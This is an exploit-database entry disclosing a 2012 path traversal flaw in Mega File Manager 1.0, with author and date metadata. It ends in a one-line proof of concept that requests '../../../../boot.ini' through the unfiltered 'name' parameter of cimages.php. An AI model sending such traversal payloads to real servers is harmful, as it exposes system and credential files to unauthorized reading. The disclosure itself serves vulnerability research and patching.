Mega File Manager - File Download
| EKU-ID: 24465 | CVE: OSVDB-81302 | OSVDB-ID: |
| Author: i2sec-Min Gi Jo | Published: 2012-04-22 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 24465 | CVE: OSVDB-81302 | OSVDB-ID: |
| Author: i2sec-Min Gi Jo | Published: 2012-04-22 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: [MegaFileManager FileDownload Vulnerability # date: 2012-04-19 # Author: i2sec-Min Gi Jo # Software Link: http://www.awesomephp.com/?Download*5 # Version: Mega File Manager V 1.0 # Tested on: Windows # Description : There is no filtering on 'cimages.php' parameter 'name'. # PoC : http://[server]/megafilemanager/cimages.php?name=../../../../boot.ini